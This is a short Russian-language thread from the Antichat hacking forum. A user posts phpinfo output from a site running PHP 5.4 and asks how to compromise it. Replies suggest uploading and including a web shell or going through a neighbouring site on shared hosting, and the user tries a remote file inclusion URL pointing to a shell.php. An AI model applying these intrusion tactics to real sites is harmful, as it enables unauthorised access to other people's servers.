HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.02.2016, 08:42
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

С этой версией все безнадежно?

Удалось вытащить phpinfo

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off

output_buffering 4096

PHP Version 5.4.45-0+deb7u2
 
Ответить с цитированием

  #2  
Старый 24.02.2016, 11:38
blackbox
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
С нами: 7561046

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  

С этой версией все безнадежно?
Удалось вытащить phpinfo
allow_url_fopen On On
allow_url_include Off Off
always_populate_raw_post_data Off
output_buffering 4096
PHP Version 5.4.45-0+deb7u2
Можно было бы попробовать https://xakep.ru/2012/01/25/58183/ , но у тебя расширение фиксированное, поэтому хз что еще посоветовать.
 
Ответить с цитированием

  #3  
Старый 24.02.2016, 12:17
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от blackbox  

Можно было бы попробовать
https://xakep.ru/2012/01/25/58183/
, но у тебя расширение фиксированное, поэтому хз что еще посоветовать.
а что тут сделаешь, заливать только файл шел. и инклудить. Хорошо если есть соседи. можно как вариант инклудить соседний сайт. Я так понимаю этот сайт - вопрос жизни и смерти
 
Ответить с цитированием

  #4  
Старый 24.02.2016, 12:23
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

а что тут сделаешь, заливать только файл шел. и инклудить. Хорошо если есть соседи. можно каквариант инклудить соседний сайт. Я так понимаю этот сайт - вопрос жизни и смерти
Там WP стоит файл install не удален,это может както помочь?
 
Ответить с цитированием

  #5  
Старый 23.03.2016, 13:53
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

Подскажите что можно сделать?

css.php?f=http://site/shell.php?.css&sid=0

форма входа отображается в виде текста

Password: >'>
 
Ответить с цитированием

  #6  
Старый 23.03.2016, 15:08
cyrhaller
Новичок
Регистрация: 18.03.2016
Сообщений: 5
С нами: 5344886

Репутация: 6
По умолчанию

Цитата:
Сообщение от .Light.  

Подскажите что можно сделать?
css.php?f=
http://site/shell.php?.css&sid=0
форма входа отображается в виде текста
Password: >'>
SSRF?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.